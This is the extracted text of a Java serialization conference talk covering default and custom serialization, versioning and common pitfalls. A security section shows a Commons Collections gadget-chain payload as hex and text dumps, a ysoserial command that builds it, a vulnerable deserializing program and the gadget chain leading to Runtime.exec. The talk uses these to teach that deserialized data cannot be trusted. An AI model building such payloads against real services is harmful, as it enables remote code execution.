Java Serialization is often considered a dark art of Java programmers. This session will lift the veil and show what serialization is and isn't, how you can use it for profit and evil. After this session no NotSerializableException will be unconquerable.

1. org.apache.commons.collections.functors.ChainedTransformer0...(z.....[..iTransfo
rmerst.-[Lorg/apache/commons/collections/Transformer;xpur.-[Lorg.apache.commons.
collections.Transformer;.V*..4.....xp....sr.;org.apache.commons.collections.func
tors.ConstantTransformerXv..A......L..iConstantt..Ljava/lang/Object;xpvr..java.l
ang.Runtime...........xpsr.:org.apache.commons.collections.functors.InvokerTrans
former...k{|.8...[..iArgst..[Ljava/lang/Object;L..iMethodNamet..Ljava/lang/Strin
g;[..iParamTypest..[Ljava/lang/Class;xpur..[Ljava.lang.Object;..X..s)l...xp....t
..getRuntimeur..[Ljava.lang.Class;......Z....xp....t..getMethoduq.~......vr..jav
a.lang.String...8z;.B...xpvq.~..sq.~..uq.~......puq.~......t..invokeuq.~......vr
..java.lang.Object...........xpvq.~..sq.~..ur..[Ljava.lang.String;..V...{G...xp.
...t."System.out.println(nnnnHello);t..execuq.~......q.~.#sq.~..sr..java.lan
g.Integer.org.apache.commons.collections.functors.ChainedTransformer0...iTransfo
rmerst.-[Lorg/apache/commons/collections/Transformer;xpur.-[Lorg.apache.commons.
collections.Transformer;.V*..4.....xp....sr.;org.apache.commons.collections.func
tors.ConstantTransformerXv..A......L..iConstantt..Ljava/lang/Object;xpvr..java.l
ang.Runtime...........xpsr.:org.apache.commons.collections.functors.InvokerTrans
former...k{|.8...[..iArgst..[Ljava/lang/Object;L..iMethodNamet..Ljava/lang/Strin
g;[..iParamTypest..[Ljava/lang/Class;xpur..[Ljava.lang.Object;..X..s)l...xp....t
..getRuntimeur..[Ljava.lang.Class;......Z....xp....t..getMethoduq.~......vr..jav
a.lang.String...8z;.B...xpvq.~..sq.~..uq.~......puq.~......t..invokeuq.~......vr
Java Serialization
Deep Dive
Martijn Dashorst
topicus

2. Agenda
1. What is (Java) Serialization?
2. How does Java Serialization work?
3. Common Pitfalls of Serialization
4. Summary

3. Martijn
Dashorst
topicus

4. Primary Education
Student Information System
5k schools in NL
1M students
15k concurrent users
ParnasSys

5. Java+HTML
Server-side
Component Oriented
Web Framework for Applications
Stateful
Built with Apache Wicket

6. What is Java
Serialization?
part 1

7. serialization | sɪərɪəlʌɪˈzeɪʃ(ə)n | noun
AC ED 00 05 73 72 00 1B
64 65 65 70 64 69 76 65
serialization deserialization
java
objects
java
objects

8. Storage of objects
Copying data
Caching of data
HTTP sessions
Transmitting data/objects
across network
Why
Serialization?

9. Default Java Serialization
Custom Java Serialization
Versioning
Serialization in a nutshell
part 2
How Does Java
Serialization
Work?
part 2
Security

10. Java
Serialization
in a nutshell
class Foo implements Serializable {
}

11. Java
Serialization
in a nutshell
class Foo implements Serializable {
}
Foo foo = new Foo();

12. Java
Serialization
in a nutshell
class Foo implements Serializable {
}
Foo foo = new Foo();
FileOutputStream fos =
new FileOutputStream("foo.ser");

13. Java
Serialization
in a nutshell
class Foo implements Serializable {
}
Foo foo = new Foo();
FileOutputStream fos =
new FileOutputStream("foo.ser");
ObjectOutputStream oos =
new ObjectOutputStream(fos);

14. Java
Serialization
in a nutshell
class Foo implements Serializable {
}
Foo foo = new Foo();
FileOutputStream fos =
new FileOutputStream("foo.ser");
ObjectOutputStream oos =
new ObjectOutputStream(fos);
oos.write(foo);

15. Java Serialization
in a nutshell
Written: 24 bytes
0 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15
1 AC ED 00 05 73 72 00 03 46 6F 6F 00 00 00 00 00 | ····sr··Foo····· |
2 00 00 01 02 00 00 78 70 | ······xp |

16. Java
Serialization
in a nutshell
class Foo implements Serializable {
}
FileInputStream fis =
new FileInputStream("foo.ser");

17. Java
Serialization
in a nutshell
class Foo implements Serializable {
}
FileInputStream fis =
new FileInputStream("foo.ser");
ObjectInputStream ois =
new ObjectInputStream(fis);

18. Java
Serialization
in a nutshell
class Foo implements Serializable {
}
FileInputStream fis =
new FileInputStream("foo.ser");
ObjectInputStream ois =
new ObjectInputStream(fis);
Object object = ois.readObject();

19. Java
Serialization
in a nutshell
class Foo implements Serializable {
}
FileInputStream fis =
new FileInputStream("foo.ser");
ObjectInputStream ois =
new ObjectInputStream(fis);
Foo foo = (Foo) ois.readObject();

20. Default Java Serialization
Custom Java Serialization
Versioning
Serialization in a nutshell
part 2
How Does Java
Serialization
Work?
part 2
Security

21. Rules of Default Serialization
1. Implement java.io.Serializable
2. Identify (non-)serializable fields
3. Have access to no-args constructor
of first non-serializable superclass
class Foo implements Serializable {
private int count;
private String name;
private Thread thread;
}

22. class Foo implements Serializable {
int f;
}
class Bar extends Foo {
int b;
}
Bar bar1 = new Bar();
bar1.f = 123;
bar1.b = 456;
ObjectOutputStream oos = new ...
oos.write(bar1);
ObjectInputStream ois = new ...
Bar bar2 = (Bar) ois.readObject();
Which are true?
bar2.f == 0
bar2.f == 123
bar2.b == 0
bar2.b == 456

23. class Foo implements Serializable {
int f;
}
class Bar extends Foo {
int b;
}
Which are true?
bar2.f == 0
bar2.f == 123
bar2.b == 0
bar2.b == 456
Bar bar1 = new Bar();
bar1.f = 123;
bar1.b = 456;
ObjectOutputStream oos = new ...
oos.write(bar1);
ObjectInputStream ois = new ...
Bar bar2 = (Bar) ois.readObject();

24. class Foo {
int f;
}
class Bar extends Foo
implements Serializable {
int b;
}
Bar bar1 = new Bar();
bar1.f = 123;
bar1.b = 456;
ObjectOutputStream oos = new ...
oos.write(bar1);
ObjectInputStream ois = new ...
Bar bar2 = (Bar) ois.readObject();
Which are true?
bar2.f == 0
bar2.f == 123
bar2.b == 0
bar2.b == 456

25. class Foo {
int f;
}
class Bar extends Foo
implements Serializable {
int b;
}
Which are true?
bar2.f == 0
bar2.f == 123
bar2.b == 0
bar2.b == 456
Bar bar1 = new Bar();
bar1.f = 123;
bar1.b = 456;
ObjectOutputStream oos = new ...
oos.write(bar1);
ObjectInputStream ois = new ...
Bar bar2 = (Bar) ois.readObject();

26. Rules of Default Serialization
1. Implement java.io.Serializable
2. Identify (non-)serializable fields
3. Have access to no-args constructor
of first non-serializable superclass
class Foo implements Serializable {
private int count;
private String name;
private Thread thread;
}

27. 2. Identify (non-)serializable fields
• primitive fields
• String, Float, Double, ...
• anything implementing
Serializable or Externalizable
• static fields
• fields of enum types
• local (physical) resources
connections, threads, file handles
Serializable Not Serializable

28. 2. Identify (non-)serializable fields
class Foo implements Serializable {
private int count;
private String name;
private transient Thread thread;
}
Use transient keyword to mark
fields not-serializable

29. 2. Identify (non-)serializable fields
class Foo implements Serializable {
private transient int count = 1234;
private String name;
private transient Thread thread;
}
ObjectInputStream ois = ...
Foo foo = (Foo) ois.readObject();
assert foo.thread == null;
assert foo.count == 0;
Use transient keyword to mark
fields non-serializable
Upon de-serialization non-
serializable fields are given a
default value:
0, false, null

30. 2. Identify (non-)serializable fields
class UsingSerialPersistentFields
implements Serializable {
private int f = 123;
private int g = 456;
private static final
ObjectStreamField[]
serialPersistentFields = {
new ObjectStreamField(
"f", Integer.TYPE) };
}
Use serialPersistentFields to
mark fields that are to be
serialized
Overrides transient keyword
Must be private static final

31. Rules of Default Serialization
1. Implement java.io.Serializable
2. Identify (non-)serializable fields
3. Have access to no-args constructor
of first non-serializable superclass
class Foo {
Foo() {
}
}
class Bar extends Foo
implements Serializable {
}
👍

32. Rules of Default Serialization
1. Implement java.io.Serializable
2. Identify (non-)serializable fields
3. Have access to no-args constructor
of first non-serializable superclass
class Foo {
Foo(int f) {
}
}
class Bar extends Foo
implements Serializable {
}
🚫

33. 3. Have access to no-args constructor of
first non-serializable super class
class Bar1 {
Bar1(int b) { }
}
class Bar2 extends Bar1
implements Serializable {
Bar2() {
super(1);
}
}
Which are true?
Serialization of bar2 succeeds
Serialization of bar2 fails with
NotSerializableException
Deserialization of b2 succeeds
Deserialization of b2 fails with
InvalidClassException
Bar2 bar2 = new Bar2();
oos.writeObject(bar2);
Bar2 b2 = (Bar2) ois.readObject();

34. 3. Have access to no-args constructor of
first non-serializable super class
class Bar1 {
Bar1(int b) { }
}
class Bar2 extends Bar1
implements Serializable {
Bar2() {
super(1);
}
}
Which are true?
Serialization of bar2 succeeds
Serialization of bar2 fails with
NotSerializableException
Deserialization of b2 succeeds
Deserialization of b2 fails with
InvalidClassException
Bar2 bar2 = new Bar2();
oos.writeObject(bar2);
Bar2 b2 = (Bar2) ois.readObject();

35. Steps of Default Serialization
class Foo implements Serializable {
}
ObjectOutputStream::writeObject(Object o)

36. Steps of Default Serialization
1. Object replacement = o.writeReplace(); class Foo implements Serializable {
private Object writeReplace() {
return this;
}
}
ObjectOutputStream::writeObject(Object o)

37. Steps of Default Serialization
1. Object replacement = o.writeReplace();
2. replacement.writeObject(oos);
class Foo implements Serializable {
private Object writeReplace() {
return this;
}
private void writeObject(
ObjectOutputStream out) {
out.writeDefault();
}
}
ObjectOutputStream::writeObject(Object o)

38. Steps of Default Deserialization
class Foo implements Serializable {
}
ObjectInputStream::readObject()

39. Steps of Default Deserialization
1. Object read = «newFoo»; class Foo implements Serializable {
}
ObjectInputStream::readObject()

40. Steps of Default Deserialization
1. Object read = «newFoo»;
2. read.readObject()
class Foo implements Serializable {
private void readObject(
ObjectInputStream in) {
in.defaultReadObject();
}
}
ObjectInputStream::readObject()

41. Steps of Default Deserialization
1. Object read = «newFoo»;
2. read.readObject()
3. result = read.readResolve()
class Foo implements Serializable {
private void readObject(...) { }
private Object readResolve() {
return this;
}
}
ObjectInputStream::readObject()

42. Steps of Default Deserialization
1. Object read = «newFoo»;
2. read.readObject()
3. result = read.readResolve()
4. result.validateObject()
class Foo implements Serializable,
ObjectInputValidation {
private void readObject(...) {}
private Object readResolve() {}
private void validateObject() {
}
}
ObjectInputStream::readObject()

43. Steps of Default Deserialization
1. Object read = «newFoo»;
2. read.readObject()
3. result = read.readResolve()
4. result.validateObject()
5. return result
class Foo implements Serializable {
private void readObject(...) {}
private Object readResolve() {}
private void validateObject() {}
}
ObjectInputStream::readObject()

44. Default Java Serialization
Custom Java Serialization
Versioning
Serialization in a nutshell
part 2
How Does Java
Serialization
Work?
part 2
Security

45. Using writeReplace for Placeholders
class NotActuallySerializable implements Serializable {
private Object writeReplace() {
return new Placeholder(someValue);
}
public static NotActuallySerializable of(String value) {
return ...;
}
}
class Placeholder implements Serializable {
private String value;
private Object readResolve() {
return NotActuallySerializable.of(value);
}
}

46. Using readResolve for Singletons
final class Serialization {
public static final Serialization YAY = new JavaEE("Yay");
public static final Serialization NAY = new JavaEE("Nay");
private final String value;
private Serialization(String v) {
this.value = v;
}
private Object readResolve() {
if(value.equals("Yay"))
return YAY;
else
return NAY;
}
}

47. class Foo implements Serializable {
static final Foo foo = new Foo();
private Object writeReplace() {
return "Hello!";
}
private Object readResolve() {
return foo;
}
}
oos.writeObject(Foo.foo);
Foo f1 = (Foo) ois.readObject();
readResolve/writeReplace
Which is true?
f1.equals("Hello!")
f1 == Foo.foo
f1 != Foo.foo
Exception is thrown

48. class Foo implements Serializable {
static final Foo foo = new Foo();
private Object writeReplace() {
return "Hello!";
}
private Object readResolve() {
return foo;
}
}
oos.writeObject(Foo.foo);
Foo f1 = (Foo) ois.readObject();
readResolve/writeReplace
Which is true?
f1.equals("Hello!")
f1 == Foo.foo
f1 != Foo.foo
Exception is thrown

49. class Foo implements Serializable {
private Object readResolve() {
return "Hello!";
}
}
class Bar extends Foo {
}
oos.writeObject(new Bar());
Object o = ois.readObject();
readResolve/writeReplace
Which are true?
o.equals("Hello!")
o instanceof String
o instanceof Bar
Exception is thrown

50. class Foo implements Serializable {
private Object readResolve() {
return "Hello!";
}
}
class Bar extends Foo {
}
oos.writeObject(new Bar());
Object o = ois.readObject();
readResolve/writeReplace
Which are true?
o.equals("Hello!")
o instanceof String
o instanceof Bar
Exception is thrown

51. class CustomValues implements Serializable {
private void writeObject(ObjectOutputStream oos)
throws IOException {
oos.defaultWriteObject();
// write custom data
}
writeObject

52. class CustomValues implements Serializable {
private void writeObject(ObjectOutputStream oos)
throws IOException {
oos.defaultWriteObject();
// write custom data
}
private void readObject(ObjectInputStream ois)
throws ClassNotFoundException, IOException {
ois.defaultReadObject();
// read custom data
// initialize transient fields
}
}
readObject
writeObject

53. Externalizable
public interface Externalizable
extends Serializable {
void writeExternal(ObjectOutput out) throws IOException;
void readExternal(ObjectInput in) throws IOException,
ClassNotFoundException;
}
Must implement java.io.Externalizable
Must have public no-args constructor
Implement both writeExternal() and readExternal()

54. ObjectInputValidation
public interface ObjectInputValidation {
public void validateObject() throws InvalidObjectException;
}
Allows the complete deserialized object graph to be validated
before returning
Should register with ObjectInputStream (in readObject):
ois.registerValidation(this, 0);
Performed after readResolve()

55. Default Java Serialization
Custom Java Serialization
Versioning
Serialization in a nutshell
part 2
How Does Java
Serialization
Work?
part 2
Security

56. class Foobar implements Serializable {
private static final long serialVersionUID = 1L;
}
It is strongly recommended that all serializable classes explicitly declare
serialVersionUID values, since the default serialVersionUID computation is
highly sensitive to class details that may vary depending on compiler implementations,
and can thus result in unexpected serialVersionUID conflicts during
deserialization, causing deserialization to fail.
Always provide serialVersionUID

57. It is strongly recommended that all serializable classes explicitly declare
serialVersionUID values, since the default serialVersionUID computation is
highly sensitive to class details that may vary depending on compiler implementations,
and can thus result in unexpected serialVersionUID conflicts during
deserialization, causing deserialization to fail.
Always provide serialVersionUID
class Foobar implements Serializable {
private static final long serialVersionUID = 1L;
}
required!!!

58. Deleting fields
Can't go from Serializable →
Externalizable
Move classes up/down hierarchy
Serializable field → Non-serializable
field (static/transient)
primitive field type change
Class → Enum or Enum → Class
Remove Serializable/Externalizable
Adding fields
Adding classes
Removing classes
Adding write/readObject
Adding Serializable
Changing access modifiers for fields
Non-Serializable field → serializable
field
Incompatible changes Compatible changes
Change serialVersionUID Don't Change serialVersionUID

59. Default Java Serialization
Custom Java Serialization
Versioning
Serialization in a nutshell
part 2
How Does Java
Serialization
Work?
part 2
Security

60. 0000160: 6d65 723b 7870 7372 003a 6f72 672e 6170 mer;xpsr.:org.ap
0000170: 6163 6865 2e63 6f6d 6d6f 6e73 2e63 6f6c ache.commons.col
0000180: 6c65 6374 696f 6e73 2e66 756e 6374 6f72 lections.functor
0000190: 732e 4368 6169 6e65 6454 7261 6e73 666f s.ChainedTransfo
00001a0: 726d 6572 30c7 97ec 287a 9704 0200 015b rmer0...(z.....[
00001b0: 000d 6954 7261 6e73 666f 726d 6572 7374 ..iTransformerst
00001c0: 002d 5b4c 6f72 672f 6170 6163 6865 2f63 .-[Lorg/apache/c
00001d0: 6f6d 6d6f 6e73 2f63 6f6c 6c65 6374 696f ommons/collectio
00001e0: 6e73 2f54 7261 6e73 666f 726d 6572 3b78 ns/Transformer;x
00001f0: 7075 7200 2d5b 4c6f 7267 2e61 7061 6368 pur.-[Lorg.apach
0000200: 652e 636f 6d6d 6f6e 732e 636f 6c6c 6563 e.commons.collec
0000210: 7469 6f6e 732e 5472 616e 7366 6f72 6d65 tions.Transforme
0000220: 723b bd56 2af1 d834 1899 0200 0078 7000 r;.V*..4.....xp.
0000230: 0000 0573 7200 3b6f 7267 2e61 7061 6368 ...sr.;org.apach
0000240: 652e 636f 6d6d 6f6e 732e 636f 6c6c 6563 e.commons.collec
0000250: 7469 6f6e 732e 6675 6e63 746f 7273 2e43 tions.functors.C
0000260: 6f6e 7374 616e 7454 7261 6e73 666f 726d onstantTransform
0000270: 6572 5876 9011 4102 b194 0200 014c 0009 erXv..A......L..
0000280: 6943 6f6e 7374 616e 7474 0012 4c6a 6176 iConstantt..Ljav
0000290: 612f 6c61 6e67 2f4f 626a 6563 743b 7870 a/lang/Object;xp
00002a0: 7672 0011 6a61 7661 2e6c 616e 672e 5275 vr..java.lang.Ru
00002b0: 6e74 696d 6500 0000 0000 0000 0000 0000 ntime...........
00002c0: 7870 7372 003a 6f72 672e 6170 6163 6865 xpsr.:org.apache
00002d0: 2e63 6f6d 6d6f 6e73 2e63 6f6c 6c65 6374 .commons.collect
00002e0: 696f 6e73 2e66 756e 6374 6f72 732e 496e ions.functors.In
00002f0: 766f 6b65 7254 7261 6e73 666f 726d 6572 vokerTransformer
0000300: 87e8 ff6b 7b7c ce38 0200 035b 0005 6941 ...k{|.8...[..iA
Serialized data
is readable

61. org.apache.commons.collections.functors.ChainedTransformer0...(z.....[..iTr
rmerst.-[Lorg/apache/commons/collections/Transformer;xpur.-[Lorg.apache.com
collections.Transformer;.V*..4.....xp....sr.;org.apache.commons.collections
tors.ConstantTransformerXv..A......L..iConstantt..Ljava/lang/Object;xpvr..j
ang.Runtime...........xpsr.:org.apache.commons.collections.functors.Invoker
former...k{|.8...[..iArgst..[Ljava/lang/Object;L..iMethodNamet..Ljava/lang/
g;[..iParamTypest..[Ljava/lang/Class;xpur..[Ljava.lang.Object;..X..s)l...xp
..getRuntimeur..[Ljava.lang.Class;......Z....xp....t..getMethoduq.~......vr
a.lang.String...8z;.B...xpvq.~..sq.~..uq.~......puq.~......t..invokeuq.~...
..java.lang.Object...........xpvq.~..sq.~..ur..[Ljava.lang.String;..V...{G.
...t."System.out.println(nnnnHello);t..execuq.~......q.~.#sq.~..sr..jav
g.Integer.org.apache.commons.collections.functors.ChainedTransformer0...iTr
rmerst.-[Lorg/apache/commons/collections/Transformer;xpur.-[Lorg.apache.com
collections.Transformer;.V*..4.....xp....sr.;org.apache.commons.collections
tors.ConstantTransformerXv..A......L..iConstantt..Ljava/lang/Object;xpvr..j
ang.Runtime...........xpsr.:org.apache.commons.collections.functors.Invoker
former...k{|.8...[..iArgst..[Ljava/lang/Object;L..iMethodNamet..Ljava/lang/
g;[..iParamTypest..[Ljava/lang/Class;xpur..[Ljava.lang.Object;..X..s)l...xp
..getRuntimeur..[Ljava.lang.Class;......Z....xp....t..getMethoduq.~......vr
a.lang.String...8z;.B...xpvq.~..sq.~..uq.~......puq.~......t..invokeuq.~...
..java.lang.Object...........xpvq.~..sq.~..ur..[Ljava.lang.String;..V...{G.
...t."System.out.println(nnnnHello);t..execuq.~......q.~.#sq.~..sr..jav
g.Integer.......8...I..valuexr..java.lang.Number...........xp....sr..java.u
ashMap......`....F..loadFactorI..thresholdxp?@......w.........xxvr..java.la
erride...........xpq.~
Don't trust
serialized data

62. public class Main {
public static void main(String[] args) throws Exception {
File file = new File(args[0]);
try (
FileInputStream fis = new FileInputStream(file);
ObjectInputStream ois = new ObjectInputStream(fis);) {
while (ois.available() >= 0)
ois.readObject();
}
}
}

63. $ java -jar ysoserial.jar CommonsCollections1 "Calc.exe" > gadget.ser
public class Main {
public static void main(String[] args) throws Exception {
File file = new File("gadget.ser")
try (
FileInputStream fis = new FileInputStream(file);
ObjectInputStream ois = new ObjectInputStream(fis);) {
while (ois.available() >= 0)
ois.readObject();
}
}
}
<dependency>
<groupId>commons-collections</groupId>
<artifactId>commons-collections</artifactId>
<version>3.1</version>
</dependency>
java Main gadget.ser

65. deserialization
gadget chain
ObjectInputStream.readObject()
AnnotationInvocationHandler.readObject()
Map(Proxy).entrySet()
AnnotationInvocationHandler.invoke()
LazyMap.get()
ChainedTransformer.transform()
ConstantTransformer.transform()
InvokerTransformer.transform()
Method.invoke()
Class.getMethod()
InvokerTransformer.transform()
Method.invoke()
Runtime.getRuntime()
InvokerTransformer.transform()
Method.invoke()
Runtime.exec()
org.apache.commons.collections.functors.ChainedTransformer0...(z.....[..iTransfo
rmerst.-[Lorg/apache/commons/collections/Transformer;xpur.-[Lorg.apache.commons.
collections.Transformer;.V*..4.....xp....sr.;org.apache.commons.collections.func
tors.ConstantTransformerXv..A......L..iConstantt..Ljava/lang/Object;xpvr..java.l
ang.Runtime...........xpsr.:org.apache.commons.collections.functors.InvokerTrans
former...k{|.8...[..iArgst..[Ljava/lang/Object;L..iMethodNamet..Ljava/lang/Strin
g;[..iParamTypest..[Ljava/lang/Class;xpur..[Ljava.lang.Object;..X..s)l...xp....t
..getRuntimeur..[Ljava.lang.Class;......Z....xp....t..getMethoduq.~......vr..jav
a.lang.String...8z;.B...xpvq.~..sq.~..uq.~......puq.~......t..invokeuq.~......vr
..java.lang.Object...........xpvq.~..sq.~..ur..[Ljava.lang.String;..V...{G...xp.
...t."System.out.println(nnnnHello);t..execuq.~......q.~.#sq.~..sr..java.lan
g.Integer.org.apache.commons.collections.functors.ChainedTransformer0...iTransfo
rmerst.-[Lorg/apache/commons/collections/Transformer;xpur.-[Lorg.apache.commons.
collections.Transformer;.V*..4.....xp....sr.;org.apache.commons.collections.func
tors.ConstantTransformerXv..A......L..iConstantt..Ljava/lang/Object;xpvr..java.l
ang.Runtime...........xpsr.:org.apache.commons.collections.functors.InvokerTrans
former...k{|.8...[..iArgst..[Ljava/lang/Object;L..iMethodNamet..Ljava/lang/Strin
g;[..iParamTypest..[Ljava/lang/Class;xpur..[Ljava.lang.Object;..X..s)l...xp....t
..getRuntimeur..[Ljava.lang.Class;......Z....xp....t..getMethoduq.~......vr..jav
a.lang.String...8z;.B...xpvq.~..sq.~..uq.~......puq.~......t..invokeuq.~......vr
..java.lang.Object...........xpvq.~..sq.~..ur..[Ljava.lang.String;..V...{G...xp.
...t."System.out.println(nnnnHello);t..execuq.~......q.~.#sq.~..sr..java.lan
g.Integer.......8...I..valuexr..java.lang.Number...........xp....sr..java.util.H
ashMap......`....F..loadFactorI..thresholdxp?@......w.........xxvr..java.lang.Ov
erride...........xpq.~
Y so seriAL

66. org.apache.commons.collections.functors.ChainedTransformer0...(z.....[..iTransf
rmerst.-[Lorg/apache/commons/collections/Transformer;xpur.-[Lorg.apache.commons
collections.Transformer;.V*..4.....xp....sr.;org.apache.commons.collections.fun
tors.ConstantTransformerXv..A......L..iConstantt..Ljava/lang/Object;xpvr..java.
ang.Runtime...........xpsr.:org.apache.commons.collections.functors.InvokerTran
former...k{|.8...[..iArgst..[Ljava/lang/Object;L..iMethodNamet..Ljava/lang/Stri
g;[..iParamTypest..[Ljava/lang/Class;xpur..[Ljava.lang.Object;..X..s)l...xp....
..getRuntimeur..[Ljava.lang.Class;......Z....xp....t..getMethoduq.~......vr..ja
a.lang.String...8z;.B...xpvq.~..sq.~..uq.~......puq.~......t..invokeuq.~......v
..java.lang.Object...........xpvq.~..sq.~..ur..[Ljava.lang.String;..V...{G...xp
...t."System.out.println(nnnnHello);t..execuq.~......q.~.#sq.~..sr..java.la
g.Integer.org.apache.commons.collections.functors.ChainedTransformer0...iTransf
rmerst.-[Lorg/apache/commons/collections/Transformer;xpur.-[Lorg.apache.commons
collections.Transformer;.V*..4.....xp....sr.;org.apache.commons.collections.fun
tors.ConstantTransformerXv..A......L..iConstantt..Ljava/lang/Object;xpvr..java.
ang.Runtime...........xpsr.:org.apache.commons.collections.functors.InvokerTran
former...k{|.8...[..iArgst..[Ljava/lang/Object;L..iMethodNamet..Ljava/lang/Stri
g;[..iParamTypest..[Ljava/lang/Class;xpur..[Ljava.lang.Object;..X..s)l...xp....
..getRuntimeur..[Ljava.lang.Class;......Z....xp....t..getMethoduq.~......vr..ja
a.lang.String...8z;.B...xpvq.~..sq.~..uq.~......puq.~......t..invokeuq.~......v
..java.lang.Object...........xpvq.~..sq.~..ur..[Ljava.lang.String;..V...{G...xp
...t."System.out.println(nnnnHello);t..execuq.~......q.~.#sq.~..sr..java.la
g.Integer.......8...I..valuexr..java.lang.Number...........xp....sr..java.util.
ashMap......`....F..loadFactorI..thresholdxp?@......w.........xxvr..java.lang.O
erride...........xpq.~
Don't trust
serialized data
Y so seriAL
https://github.com/frohoff/ysoserial

67. Inner/nested classes
CDI/Spring/Singletons
part 2
Common Pitfalls
of Java
Serialization
part 3

68. ApplicationScoped
Spring beans
Singletons
Services
@ApplicationScoped
class FooService {
void foo() {}
}
class Bar implements Serializable {
@Inject
private FooService fooService;
void doSomething() {
fooService.foo();
}
}

69. ApplicationScoped
Spring beans
Singletons
Services
@ApplicationScoped
class FooService {
void foo() {}
}
class Bar implements Serializable {
@Inject
private FooService fooService;
void doSomething() {
fooService.foo();
}
}
• Serializes too much (possibly whole
service layer)
• Deserializes to non-managed
services
• Deserialization gives multiple
instances of one service

70. ApplicationScoped
Spring beans
Singletons
Services
@ApplicationScoped
class FooService {
void foo() {}
}
class Bar implements Serializable {
@Inject
private FooService fooService;
void doSomething() {
fooService.foo();
}
}
• Use a serializable proxy that looks
up service (CDI)
• Use readResolve/writeReplace for
custom serialization/deserialization
• CDI @Singleton injection *doesn't*
inject a serializable proxy, but the
instance directly

71. Inner/nested classes
CDI/Spring/Singletons
part 2
Common Pitfalls
of Java
Serialization
part 3

72. Inner/Nested classes
class FooService {
class Bar implements Serializable {}
public Bar getBar() {
return new Bar();
}
}
ObjectOutputStream oos = ...;
FooService service = ...;
Bar bar = service.getBar();
oos.writeObject(bar);
Which is true?
gives compilation error at
one of last two lines
bar gets serialized
Exception is thrown

73. Inner/Nested classes
class FooService {
class Bar implements Serializable {}
public Bar getBar() {
return new Bar();
}
}
ObjectOutputStream oos = ...;
FooService service = ...;
Bar bar = service.getBar();
oos.writeObject(bar);
Which is true?
gives compilation error at
one of last two lines
bar gets serialized
Exception is thrown

74. Inner/Nested classes
class FooService {
class Bar implements Serializable {}
public Bar getBar() {
return new Bar();
}
}
ObjectOutputStream oos = ...;
FooService service = ...;
Bar bar = service.getBar();
oos.writeObject(bar);
Not serializable
requires
a Foo
instance

75. Agenda
1. What is (Java) Serialization?
2. How does Java Serialization work?
3. Common Pitfalls of Serialization
4. Summary

76. Summary
• Versatile
• Flexible
• Complete
• Complex
Java serialization is
• Insecure
Java deserialization is

77. performance considerations
java
XML/JAXB
source, 27-10-2016: https://github.com/eishay/jvm-serializers/wiki

78. size considerations
java
XML/JAXB
source, 27-10-2016: https://github.com/eishay/jvm-serializers/wiki